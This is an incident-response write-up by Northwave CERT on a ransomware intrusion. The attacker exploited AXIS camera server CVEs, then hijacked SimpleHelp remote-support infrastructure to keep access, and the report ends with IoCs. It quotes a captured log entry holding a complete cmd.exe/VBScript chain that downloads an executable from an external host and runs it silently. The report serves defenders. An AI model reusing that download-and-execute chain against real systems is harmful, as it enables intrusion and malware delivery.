Skip to content
arrow-alt-circle-up icon

Cyber Incident?

arrow-alt-circle-up icon

Call 00800 1744 0000

arrow-alt-circle-up icon

How Modern Ransomware Hijacks Trusted Infrastructure  

Insights from a real attack investigation by Northwave CERT   

HuFiCon Management Memo:
Journey with the CISO

A mountain climb to cyber security resilience. Find out how to get to the summit of cyber security resilience in Inge van der Beijl's management memo, from her presentation at the Human Firewall Conference (HuFiCon) on the 14.11.2024.

The climb will take you from the base camp of foundational security to the high-camp of a security conscious culture, all the way to the summit consisting of strategic security integration. 

inge_van_der_beijl
Inge van der Beijl

Director Innovation

Ransomware-Hijacks-Main
Published: February 2026

Investigating Emerging Ransomware Tactics

Ransomware attacks often follow a familiar pattern: exploit a vulnerability, move laterally through the network, deploy encryption, and demand payment.

But, in a recent incident response handled by Northwave’s Computer Emergency Response Team (NW-CERT), our experts uncovered a more subtle, stealthy tactic. After exploiting a vulnerable system to pivot into the organisation, the threat actor used vulnerable legitimate infrastructure to keep persistent access.

In this report, NW-CERT shares insights from the investigation and IoCs to help security teams recognise similar patterns and prevent threat actors from turning trusted systems into controlled footholds.

Initial access through not-yet-observed exploitation

The threat actor gained initial access through an AXIS camera server running two old vulnerabilities: CVE‑2025‑30026 (authentication bypass) and CVE‑2025‑30023 (remote code execution).

At the time of the incident, we had not observed public reporting of these vulnerabilities being exploited in the wild. We did, however, find several publications that discussed how such vulnerabilities could be exploited in practice. As highlighted in reports published in August 2025 here and here, specific indicators may appear in logs when exploitation occurs.

When reviewing the logs located in 'C:\ProgramData\Axis Communications\AXIS Camera Station\Core\Server\Logs\' for similar indicators, we identified a suspicious session being opened. The log entry contained the following record:

Opened <> - Opened id://id/%EF%BF%BD%04%00%00

This session ID and format differed from previous open sessions seen in the logs, suggesting possible manipulation. This gave us an interesting clue. Upon closer analysis, we discovered this session contained additional data that suggested exploitation activity. The log entry included the following request structure and showed that the vulnerable port 55752 on the AXIS server was used for connection:

{"Service":"SessionFacade","Method":"LogOnAsync","Parameters":{"uri":"net.tcp://'':55752”…"MethodName":"Start”.."$values":["cmd.exe","/c echo Set x=CreateObject(\"Microsoft.XMLHTTP\"):x.Open \"GET\",\"https://www.< domain1>[.]com/access/Remote Access-windows64-online.exe?language=en&...&hostname=http://< ip1>&ie=ie.exe\",0:x.Send:If x.Status=200 Then Set s=CreateObject(\"ADODB.Stream\"):s.Open:s.Type=1:s.Write x.responseBody:s.SaveToFile \"%temp%//up.exe\",2:s.Close:Set w=CreateObject(\"WScript.Shell\"):w.Run \"%temp%//up.exe\",0:End If >dl.vbs & cscript //nologo dl.vbs & del dl.vbs/n"]},

As can been seen in the log entry, we did not only observe the vulnerable port being reached by the threat actor, but also a whole chain of commands. It was an intriguing breadcrumb and one we could not easily ignore. So, we took the opportunity to dig deeper to better understand the threat actor’s techniques.

SimpleHelp calling for help?

In most ransomware cases, we see that after successful initial access, threat actors use legitimate Remote Monitoring and Management (RMM) tools such as AnyDesk to maintain persistence. This is a common pattern:

  • obtain initial access
  • install an RRM agent
  • establish connection to a central remote management server
  • continue the intrusion from there

However, in this case, we observed a different scenario.
We saw in the AXIS logs that the AXIS server was reaching out to <domain1>[.]com to download and execute filename ‘up[.]exe’. Analysis of this file showed that it was a SimpleHelp installer. Once executed, this installer connected to <ip1>. We validated this, identifying it as a legitimate SimpleHelp server operated by a US‑based company. As such, on the surface, this looked like a normal installation of a legitimate remote‑support agent, connecting to a legitimate SimpleHelp server. If anything, we hypothesised the threat actor tried to blend in by leveraging a legitimate remote-support infrastructure. However, hypotheses alone are not conclusive findings. And, we know from experience that one single log source rarely tells the whole story.

So, we kept digging.
After combing through several log sources, including the SimpleHelp session logs and traffic logs, we came across another IP address. This IP address was not of the legitimate remote-support infrastructure. And yet, it had been connecting to the AXIS server every single day. When we put that IP address through our threat intelligence sources, it lit up immediately: flagged as malicious in multiple feeds.

That is when we could clearly see the full picture. What the threat actor was actually doing was far more subtle and clever than just dropping an RMM tool. The initial SimpleHelp server itself had multiple weaknesses (CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728) that the threat actor most likely used to gain access to the server. Once access is obtained, the legitimate but vulnerable server could be used for illegitimate activity, as observed.

onHere's a quick summary of how the ransomware attack worked:

  1. The threat actor exploited AXIS vulnerabilities to run code.
  2. That code downloaded and executed a legitimate SimpleHelp installer on the AXIS server.
  3. The installer connected to a vulnerable SimpleHelp server.
  4. The threat actor exploited the vulnerable SimpleHelp server to obtain access to the AXIS server.
  5. The threat actor replaced the vulnerable SimpleHelp server with their own malicious SimpleHelp server.
  6. The victim’s AXIS server pivoted over to the malicious SimpleHelp infrastructure.
  7. The malicious SimpleHelp server began connecting with the victim’s AXIS server daily — long before the ransomware was deployed.

This redirection technique essentially gave the threat actor a way to slip in quietly using a legitimate installer as the trojan horse, before switching to their own Command and Control setup.

Stars

What can we learn from this ransomware attack?

Threat actors are constantly evolving their tactics. This latest case highlights three important developments in modern ransomware operations:

  • Known vulnerabilities can be weaponised even before public exploitation is widely reported.
  • Legitimate remote management tools can be abused in ways that blend almost perfectly into normal operations.
  • Infrastructure you trust can be quietly repurposed against you, without immediately triggering suspicion.

These days, threat actors actively scan for older or newly disclosed vulnerabilities and may operationalise them before reporting catches up. Advances in adversarial AI tools are giving threat actors an advantage with fast, non-stop vulnerability scanning. That is why waiting for confirmed public exploitation is no longer a safe strategy. Your organisation can easily become the first visible victim.

Proactive patching is critical but with an average of more than 100 vulnerabilities disclosed daily, prioritisation is one of the biggest challenges security teams face. Combining expert vulnerability management with actionable cyber threat intelligence enables organisations to focus on their specific business risks. Equally important is continuous monitoring. A mature 24/7 Security Operations Centre (SOC) can detect subtle anomalies and take immediate action to neutralise threats.

In conclusion, we are seeing many different ways that ransomware is shifting from loud disruption to quiet control. Recognising how trusted infrastructure can be turned against you is now fundamental to true cyber resilience.

Want deeper insights into emerging ransomware tactics? Northwave partnered with cyber insurance provider Marsh on an in-depth report covering the latest developments in the ransomware ecosystem and proven approaches to strengthening cyber resilience.

ransomware-whitepaper

IoCs

Files

  • up.exe — SimpleHelp installer dropped via exploitation

  • dl.vbs — temporary downloader script

Domains

  • <domain1>.com — legitimate SimpleHelp domain

IPs

  •  <ip1> legitimate SimpleHelp server

  • 146.70.41[.]131 — threat actor’s SimpleHelp server, connecting daily

  • 91.199.163[.]108 — IP address used to exploit AXIS server

Log Clues

  • Suspicious AXIS session ID: 

    Opened <> - Opened id://id/%EF%BF%BD%04%00%00

  • Remote commands launching cmd.exe to pull and run up.exe

We are here for you

Need help with your cyber security or wondering how secure your business really is?
Get in touch and we will help you find the best solution.

.